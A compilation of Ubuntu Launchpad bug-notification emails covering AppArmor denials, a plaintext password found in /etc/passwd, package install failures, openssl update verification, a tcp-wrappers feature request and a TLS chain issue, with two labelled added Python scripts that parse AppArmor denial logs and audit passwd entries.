  This is a fresh installation of Ubuntu 18.04.3. I take great care not
  to mess with system components such as snapd. Other snaps are working
  properly.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1851661/+subscriptions
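
The denial records quoted in this report already name the profile, and so the snap, whose packager owns the policy. The following Python script is an added example, not part of the thread and not AppArmor or snapd code: it parses AppArmor DENIED records, collapses the duplicate audit/kernel copies of one event, and pulls the snap name out of the profile. The function names are hypothetical and the third sample line is constructed.

```python
import re

# The two denial lines are the ones quoted in the bug report; the third line
# is constructed noise to show that non-AppArmor lines are skipped.
SAMPLE_JOURNAL = """\
nov 07 11:18:29 alq22 audit[27542]: AVC apparmor="DENIED" operation="open" profile="snap.pick-colour-picker.pick-colour-picker" name="/proc/27542/mounts" pid=27542 comm="python3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
nov 07 11:18:29 alq22 kernel: audit: type=1400 audit(1573136309.796:304): apparmor="DENIED" operation="open" profile="snap.pick-colour-picker.pick-colour-picker" name="/proc/27542/mounts" pid=27542 comm="python3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
nov 07 11:18:30 alq22 systemd[1]: Started Session 4 of user example.
"""

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Snap-generated profiles are named snap.<snap-name>.<app-or-hook>
SNAP_PROFILE_RE = re.compile(r"^snap\.([^.]+)\.(.+)$")
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2})+")
# The audit layer hex-encodes these string fields (and drops the quotes)
# when the value contains spaces, quotes or control characters.
HEX_ENCODABLE = {"name", "comm", "profile"}


def parse_denial(line):
    """Return the key=value fields of an AppArmor DENIED record, else None."""
    if 'apparmor="DENIED"' not in line:
        return None
    fields = {}
    for m in FIELD_RE.finditer(line):
        key, quoted, bare = m.group(1), m.group(2), m.group(3)
        if quoted is not None:
            value = quoted
        elif key in HEX_ENCODABLE and HEX_RE.fullmatch(bare):
            value = bytes.fromhex(bare).decode("utf-8", "replace")
        else:
            value = bare
        fields[key] = value
    return fields


def describe(fields):
    """Reduce a parsed record to what matters when reporting it upstream."""
    profile = fields.get("profile", "")
    m = SNAP_PROFILE_RE.match(profile)
    pid = fields.get("pid", "")
    path = fields.get("name", "")
    own_proc = "/proc/%s/" % pid
    # A process reading its own /proc entry: write the path the way an
    # AppArmor rule would, using the @{pid} variable.
    if pid and path.startswith(own_proc):
        path = "/proc/@{pid}/" + path[len(own_proc):]
    return {
        "snap": m.group(1) if m else None,
        "app": m.group(2) if m else None,
        "profile": profile,
        "operation": fields.get("operation", ""),
        "path": path,
        "denied_mask": fields.get("denied_mask", ""),
        "comm": fields.get("comm", ""),
        "pid": pid,
    }


def summarize(journal_text):
    """Return one entry per distinct denial.

    journald shows the same event twice (audit[PID] and kernel: audit), so
    identical records from the same pid are collapsed into one.
    """
    seen, events = set(), []
    for line in journal_text.splitlines():
        fields = parse_denial(line)
        if fields is None:
            continue
        event = describe(fields)
        key = tuple(sorted(event.items()))
        if key not in seen:
            seen.add(key)
            events.append(event)
    return events


if __name__ == "__main__":
    for ev in summarize(SAMPLE_JOURNAL):
        if ev["snap"]:
            owner = "snap '%s' (contact details: snap info %s)" % (ev["snap"], ev["snap"])
        else:
            owner = "non-snap profile '%s'" % ev["profile"]
        print("%s: %s denied '%s' on %s for %s[%s]" % (
            owner, ev["operation"], ev["denied_mask"], ev["path"], ev["comm"], ev["pid"]))
```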



[Touch-packages] [Bug 1851300] Re: Xubuntu 18.04 passwd file in etc displays passwd unencrypted

2019-11-04 Thread Seth Arnold
I've selected the most likely packages to be involved, based on a guess.
Without knowing how the user attempted to set their password though,
this is going to be pretty impossible to track down.

/etc/passwd hasn't had passwords stored in it by default for something
like 25 years. My best guess at the moment is some vastly inappropriate
tool was used somewhere along the way (with suspicion leaning towards
web-based 'consoles').

If you can figure out how this happened (or better yet, tell us how to
recreate it), please do report back and mark the bug New again.

Thanks

** Information type changed from Private Security to Public Security

** Also affects: pam (Ubuntu)
   Importance: Undecided
   Status: New

** Also affects: shadow (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: base-passwd (Ubuntu)
   Status: New => Incomplete

** Changed in: pam (Ubuntu)
   Status: New => Incomplete

** Changed in: shadow (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to base-passwd in Ubuntu.
https://bugs.launchpad.net/bugs/1851300

Title:
  Xubuntu 18.04 passwd file in etc displays passwd unencrypted

Status in base-passwd package in Ubuntu:
  Incomplete
Status in pam package in Ubuntu:
  Incomplete
Status in shadow package in Ubuntu:
  Incomplete

Bug description:
  Hello,

  I have a workshop where I provide mostly Ubuntu community editions in
  computers and help people coming with computers already setup with a
  *buntu version. A lady came to me as she couldn't master her computer,
  (there is someone in town who installs Ubuntu editions without
  teaching his clients how to deal with their machines).

  She has an Ubuntu Xfce (Xubuntu) 18.04.x which is what she currently
  uses, especially as she doesn't know how to boot to the other OS. :s

  So I chrooted from a live to recreate her Xubuntu user passwd, and oh
  surprise! The /etc/passwd file was showing her password in plain text,
  unencrypted. (I could read it easily, it was her family name!).

  I have not had the time to dig further, check other editions and
  versions except the ones I use, however I think, as it has happened in
  the past, the persons in charge should look into it and check all
  recent Ubuntu and community versions editions (if relevant).

  Thanks for your work!

  Best regards,
  Mélodie

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/base-passwd/+bug/1851300/+subscriptions
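
Seth's point that /etc/passwd normally carries no passwords can be checked mechanically. The following Python script is an added example, not from the thread or from any Ubuntu package: it classifies the second field of each passwd entry and reports anything other than the shadow placeholder or a lock marker. The sample file, the status labels and the function names are constructed for illustration.

```python
import re

# Constructed sample; no real accounts, passwords or hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:Dupont:1000:1000:Alice,,,:/home/alice:/bin/bash
bob:$6$constructedsalt$constructedhashvalue0000:1001:1001::/home/bob:/bin/bash
carol::1002:1002::/home/carol:/bin/bash
broken-line-without-fields
"""

# Modular crypt format: $<id>$..., for example $6$ (SHA-512) or $y$ (yescrypt)
MODULAR_CRYPT_RE = re.compile(r"^\$[0-9A-Za-z-]+\$.+")
# Traditional DES crypt: exactly 13 characters from the crypt alphabet.
# A 13-character alphanumeric cleartext string looks the same, hence "possible".
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify_password_field(value):
    """Classify field 2 of a passwd entry."""
    if value == "x":
        return "shadowed"            # normal: the hash lives in /etc/shadow
    if value == "":
        return "empty"               # no password set in this file at all
    unlocked = value.lstrip("!")     # '!' prefix marks a locked password
    if value.startswith("*") or unlocked == "":
        return "locked"
    if MODULAR_CRYPT_RE.match(unlocked):
        return "hash-in-passwd"      # a hash, but in a world-readable file
    if DES_CRYPT_RE.match(unlocked):
        return "possible-des-hash"
    return "not-a-hash"              # the case described in the report


def audit_passwd(text):
    """Return (line number, user, status) for every entry needing attention.

    The field value itself is never returned, so the report can be shared
    without leaking whatever was stored there.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append((lineno, parts[0], "malformed"))
            continue
        status = classify_password_field(parts[1])
        if status not in ("shadowed", "locked"):
            findings.append((lineno, parts[0], status))
    return findings


if __name__ == "__main__":
    for lineno, user, status in audit_passwd(SAMPLE_PASSWD):
        print("line %d: %s: %s" % (lineno, user, status))
```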



[Touch-packages] [Bug 1845741] Re: package libpam-runtime 1.1.8-3.6ubuntu2 failed to install/upgrade: le paquet est dans un état vraiment incohérent; vous devriez le réinstaller avant de tenter de le

2019-10-01 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1845741

Title:
  package libpam-runtime 1.1.8-3.6ubuntu2 failed to install/upgrade: le
  paquet est dans un état vraiment incohérent; vous devriez  le
  réinstaller avant de tenter de le configurer.

Status in pam package in Ubuntu:
  New

Bug description:
  I cannot download any application; it always notifies me that there is
  a problem

  ProblemType: Package
  DistroRelease: Ubuntu 18.04
  Package: libpam-runtime 1.1.8-3.6ubuntu2
  ProcVersionSignature: Ubuntu 4.15.0-20.21-generic 4.15.17
  Uname: Linux 4.15.0-20-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7
  AptOrdering:
   libpam-runtime:amd64: Configure
   cups-browsed:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  Date: Sat Sep 28 00:43:19 2019
  DpkgTerminalLog:
   dpkg: erreur de traitement du paquet libpam-runtime (--configure) :
le paquet est dans un état vraiment incohérent; vous devriez
le réinstaller avant de tenter de le configurer.
  ErrorMessage: le paquet est dans un état vraiment incohérent; vous devriez  
le réinstaller avant de tenter de le configurer.
  InstallationDate: Installed on 2018-05-12 (503 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.6, Python 3.6.5, python3-minimal, 3.6.5-3
  PythonDetails: /root/Error: command ['which', 'python'] failed with exit code 
1:, Error: [Errno 2] Aucun fichier ou dossier de ce type: "/root/Error: command 
['which', 'python'] failed with exit code 1:": "/root/Error: command ['which', 
'python'] failed with exit code 1:", unpackaged
  RelatedPackageVersions:
   dpkg 1.19.0.5ubuntu2.1
   apt  1.6.3ubuntu0.1
  SourcePackage: pam
  Title: package libpam-runtime 1.1.8-3.6ubuntu2 failed to install/upgrade: le 
paquet est dans un état vraiment incohérent; vous devriez  le réinstaller avant 
de tenter de le configurer.
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1845741/+subscriptions



[Touch-packages] [Bug 1832421] Re: openssl reboot needed message using incorrect path to X server

2019-09-25 Thread Seth Arnold
Seems to work fine on disco:

sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (15.5 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1=1.1.1b-1ubuntu2.1 
openssl=1.1.1b-1ubuntu2.1
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be DOWNGRADED:
  libssl1.1 openssl
0 upgraded, 0 newly installed, 2 downgraded, 0 to remove and 23 not upgraded.
Need to get 0 B/1,921 kB of archives.
After this operation, 15.4 kB disk space will be freed.
Do you want to continue? [Y/n] 
Preconfiguring packages ...
dpkg: warning: downgrading libssl1.1:amd64 from 1.1.1b-1ubuntu2.4 to 
1.1.1b-1ubuntu2.1
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
dpkg: warning: downgrading openssl from 1.1.1b-1ubuntu2.4 to 1.1.1b-1ubuntu2.1
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.1) ...
Setting up openssl (1.1.1b-1ubuntu2.1) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (68.3 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...


** Tags added: verification-done-disco

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.

[Touch-packages] [Bug 1832522] Re: openssl maintainer scripts do not trigger services restart

2019-09-25 Thread Seth Arnold
Seems to work fine from disco:

sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (15.5 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1=1.1.1b-1ubuntu2.1 
openssl=1.1.1b-1ubuntu2.1
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be DOWNGRADED:
  libssl1.1 openssl
0 upgraded, 0 newly installed, 2 downgraded, 0 to remove and 23 not upgraded.
Need to get 0 B/1,921 kB of archives.
After this operation, 15.4 kB disk space will be freed.
Do you want to continue? [Y/n] 
Preconfiguring packages ...
dpkg: warning: downgrading libssl1.1:amd64 from 1.1.1b-1ubuntu2.4 to 
1.1.1b-1ubuntu2.1
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
dpkg: warning: downgrading openssl from 1.1.1b-1ubuntu2.4 to 1.1.1b-1ubuntu2.1
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.1_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.1) over (1.1.1b-1ubuntu2.4) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.1) ...
Setting up openssl (1.1.1b-1ubuntu2.1) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...
sarnold@millbarge:~$ sudo apt install libssl1.1 openssl
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-image-5.0.0-20-generic linux-image-5.0.0-21-generic 
linux-image-5.0.0-23-generic linux-modules-5.0.0-20-generic 
linux-modules-5.0.0-21-generic linux-modules-5.0.0-23-generic
  linux-modules-extra-5.0.0-20-generic linux-modules-extra-5.0.0-21-generic 
linux-modules-extra-5.0.0-23-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1 openssl
2 upgraded, 0 newly installed, 0 to remove and 23 not upgraded.
Need to get 1,928 kB of archives.
After this operation, 15.4 kB of additional disk space will be used.
Get:1 http://wopr/ubuntu disco-proposed/main amd64 libssl1.1 amd64 
1.1.1b-1ubuntu2.4 [1,305 kB]
Get:2 http://wopr/ubuntu disco-proposed/main amd64 openssl amd64 
1.1.1b-1ubuntu2.4 [624 kB]
Fetched 1,928 kB in 0s (68.3 MB/s)
Preconfiguring packages ...
(Reading database ... 91100 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Preparing to unpack .../openssl_1.1.1b-1ubuntu2.4_amd64.deb ...
Unpacking openssl (1.1.1b-1ubuntu2.4) over (1.1.1b-1ubuntu2.1) ...
Setting up libssl1.1:amd64 (1.1.1b-1ubuntu2.4) ...
Setting up openssl (1.1.1b-1ubuntu2.4) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-0ubuntu2) ...


** Tags removed: verification-needed-disco
** Tags added: verification-done-disco

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, 

[Touch-packages] [Bug 1839598] Re: tcp_wrappers does not whitelisting of domains, vs IPs

2019-08-09 Thread Seth Arnold
Hello Federico,

Wietse is correct. You will not get security benefits from your proposed
changes.

Public key authentication, combined with a 2FA mechanism such as TOTP
for interactive users, is the current best practice.

IP filtering is a useful tool; you can already have good benefits from
allowing the /16 or /24 or whatever address ranges your contractors are
expected to be using. That will drastically reduce the number of
compromised hosts on the internet that can contact your server and
perform password brute-force authentication attempts.

The single best security improvement you can make is disable password
authentication in openssh-server and require authorized_keys to log in.

We will not make drastic changes to the design and implementation of
tcp-wrappers.

Thanks for your interest in making Ubuntu more secure

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to tcp-wrappers in Ubuntu.
https://bugs.launchpad.net/bugs/1839598

Title:
  tcp_wrappers does not whitelisting of domains, vs IPs

Status in tcp-wrappers package in Ubuntu:
  New

Bug description:
  TCP Wrappers (also known as tcp_wrappers) is a host-based networking ACL 
system, used to filter network access to Internet Protocol servers. It allows 
host or subnetwork IP addresses, names and/or ident query replies, to be used 
as tokens on which to filter for access control purposes. The original code was 
written by Wietse Venema in 1990. He maintained it until 1995, and on June 1, 
2001, released it under its own BSD-style license. The tarball includes a 
library named Libwrap that implements the actual functionality. I had an email 
conversation with him that led nowhere. He does not agree with my request 
for a redesign.
  Very concisely, there is no way as of now to whitelist a domain, vs an IP 
address. You need to know the IP address to which the domain resolves to 
beforehand, which makes domain updates impossible to process. This causes 
tremendous operational problems when the person you need to give access to has 
an IP address that changes often. 
  But I need to digress. Every foreign worker is a potential hacker, for there 
is no way to perform a security check on her/him. Many companies use them 
nevertheless because of the low cost. I know a company that hires North Korean 
engineers working out of mainland China. They log in for legitimate purposes to 
American corporate servers. They actually live in North Korea and are forced to 
go back home every 3 weeks. They only have access to dynamic IP addresses, where a 
PTR record does not exist, thus, no reverse-hostname is possible. As a fact: no 
dynamic IP address has a corresponding PTR record.
  The question is how to whitelist a remote worker’s IP automatically. This 
issue cannot be easily solved since commercial VPNs do not guarantee that the 
same IP will be offered on the next connection. Many small companies that hire 
foreign workers end up creating fence servers, but that is exponentially more 
insecure since now you have a potential hacker sitting comfortably inside your 
firewall, behind your line of defense. Your network may have access to other 
companies networks, all the way up to a power station or a government facility, 
maybe a nuclear facility. A very somber scenario.
  Since Libwrap is the ultimate defense to keep hackers from controlling your 
servers, it should ONLY verify if an incoming connection resolves to a domain 
listed in /etc/hosts.allow. It does not. Prior, it performs a hostname check 
that invariably fails unless the pair IP address/ domain exists in /etc/hosts, 
but of course that information changes sometimes hourly. As a result of this 
problem, you cannot use it as a gatekeeper for remote access from dynamic IP 
addresses, increasing your level of insecurity.
  As I said, I explained all these ideas to the author, Wietse, without 
success. He insisted that using a public key was how you protect servers. I 
disagree. Without Libwrap, which means IP whitelisting, a simple public key 
mechanism is suicidal. It is very easy to see why. In a first step, a hacker 
steals the pair public-private key from a box which has legitimate access to 
your network. Then he uses the pair in another box located in his country, from 
which he will access your network as if he were the legitimate client or 
worker. It happened to me already. Libwrap applied to a domain plus public key 
will perform infinitely better than a public key alone. In fact, public key 
alone should not be used at all. This is obvious since by using it, you are 
delegating your security to the box you are allowing to connect, so your entire 
network is now as secure as your client or worker’s home network, which you 
don’t control. You just opened the doors of your company wide-open.
  What I suggest is to modify Libwrap so a domain listed in /etc/hosts.allow 
would work for real, just performing a simple DNS 

[Touch-packages] [Bug 1839598] Re: tcp_wrappers does not whitelisting of domains, vs IPs

2019-08-09 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to tcp-wrappers in Ubuntu.
https://bugs.launchpad.net/bugs/1839598

Title:
  tcp_wrappers does not whitelisting of domains, vs IPs

Status in tcp-wrappers package in Ubuntu:
  New

Bug description:
  TCP Wrappers (also known as tcp_wrappers) is a host-based networking ACL 
system, used to filter network access to Internet Protocol servers. It allows 
host or subnetwork IP addresses, names and/or ident query replies, to be used 
as tokens on which to filter for access control purposes. The original code was 
written by Wietse Venema in 1990. He maintained it until 1995, and on June 1, 
2001, released it under its own BSD-style license. The tarball includes a 
library named Libwrap that implements the actual functionality. I had an email 
conversation with him that led nowhere. He does not agree with my request 
for a redesign.
  Very concisely, there is no way as of now to whitelist a domain, vs an IP 
address. You need to know the IP address to which the domain resolves to 
beforehand, which makes domain updates impossible to process. This causes 
tremendous operational problems when the person you need to give access to has 
an IP address that changes often. 
  But I need to digress. Every foreign worker is a potential hacker, for there 
is no way to perform a security check on her/him. Many companies use them 
nevertheless because of the low cost. I know a company that hires North Korean 
engineers working out of mainland China. They log in for legitimate purposes to 
American corporate servers. They actually live in North Korea and are forced to go 
back home every 3 weeks. They only have access to dynamic IP addresses, where a 
PTR record does not exist, thus, no reverse-hostname is possible. As a fact: no 
dynamic IP address has a corresponding PTR record.
  The question is how to whitelist a remote worker’s IP automatically. This 
issue cannot be easily solved since commercial VPNs do not guarantee that the 
same IP will be offered on the next connection. Many small companies that hire 
foreign workers end up creating fence servers, but that is exponentially more 
insecure since now you have a potential hacker sitting comfortably inside your 
firewall, behind your line of defense. Your network may have access to other 
companies networks, all the way up to a power station or a government facility, 
maybe a nuclear facility. A very somber scenario.
  Since Libwrap is the ultimate defense to keep hackers from controlling your 
servers, it should ONLY verify if an incoming connection resolves to a domain 
listed in /etc/hosts.allow. It does not. Prior, it performs a hostname check 
that invariably fails unless the pair IP address/ domain exists in /etc/hosts, 
but of course that information changes sometimes hourly. As a result of this 
problem, you cannot use it as a gatekeeper for remote access from dynamic IP 
addresses, increasing your level of insecurity.
  As I said, I explained all these ideas to the author, Wietse, without 
success. He insisted that using a public key was how you protect servers. I 
disagree. Without Libwrap, which means IP whitelisting, a simple public key 
mechanism is suicidal. It is very easy to see why. In a first step, a hacker 
steals the pair public-private key from a box which has legitimate access to 
your network. Then he uses the pair in another box located in his country, from 
which he will access your network as if he were the legitimate client or 
worker. It happened to me already. Libwrap applied to a domain plus public key 
will perform infinitely better than a public key alone. In fact, public key 
alone should not be used at all. This is obvious since by using it, you are 
delegating your security to the box you are allowing to connect, so your entire 
network is now as secure as your client or worker’s home network, which you 
don’t control. You just opened the doors of your company wide-open.
  What I suggest is to modify Libwrap so a domain listed in /etc/hosts.allow 
would work for real, just performing a simple DNS lookup to match the IP 
address to the domain. Right now, this is impossible.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/tcp-wrappers/+bug/1839598/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1838802] Re: ca-certificates missing trusted entry from linuxfoundation

2019-08-02 Thread Seth Arnold
Hello,

It appears the source.codeaurora.org site has not correctly configured
their TLS certificate chain:

https://www.ssllabs.com/ssltest/analyze.html?d=source.codeaurora.org

"Chain issues   Incomplete, Extra certs"

If you can contact the admins for this site, please ask them to include
all necessary intermediate certificates provided by their CA.

Thanks

** Changed in: ca-certificates (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1838802

Title:
  ca-certificates missing trusted entry from linuxfoundation

Status in ca-certificates package in Ubuntu:
  Invalid

Bug description:
  source.codeaurora.org (linuxfoundation) changed their certificate on
  30 JUL 2019. When cloning from codeaurora, you now get this error:

  $ git clone https://source.codeaurora.org/external/imx/libdrm-imx.git/
  Cloning into 'libdrm-imx'...
  fatal: unable to access 'https://source.codeaurora.org/external/imx/libdrm-imx.git/': server certificate verification failed. CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none

  I think this suggests that the issuing CA Authority is not trusted and
  included in ca-certificates.crt. I've confirmed this certificate
  validation issue on both Ubuntu 16.04 and Ubuntu 18.04. I've even
  upgraded and reinstalled the ca-certificates package and still get the
  same validation error.

  I assumed it might be a problem with my clock out of sync, so I
  synchronized my server time with chrony and the issue persists. I can
  add the certificate manually to my installation of git and get around
  the issue, but I suspect that this issue will impact anyone attempting
  to clone from the linux foundation git servers.

  I've attached the source.codeaurora.org certificate to this bug
  report. The certificate shows that the issuing authority is "Sectigo
  RSA Domain Validation Secure Server CA"

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/1838802/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1836335] Re: package base-files 9.4ubuntu4.9 failed to install/upgrade: subprocess installed post-installation script returned error exit status 127

2019-07-15 Thread Seth Arnold
*** This bug is a duplicate of bug 1836236 ***
https://bugs.launchpad.net/bugs/1836236

** Information type changed from Private Security to Public

** This bug has been marked a duplicate of bug 1836236
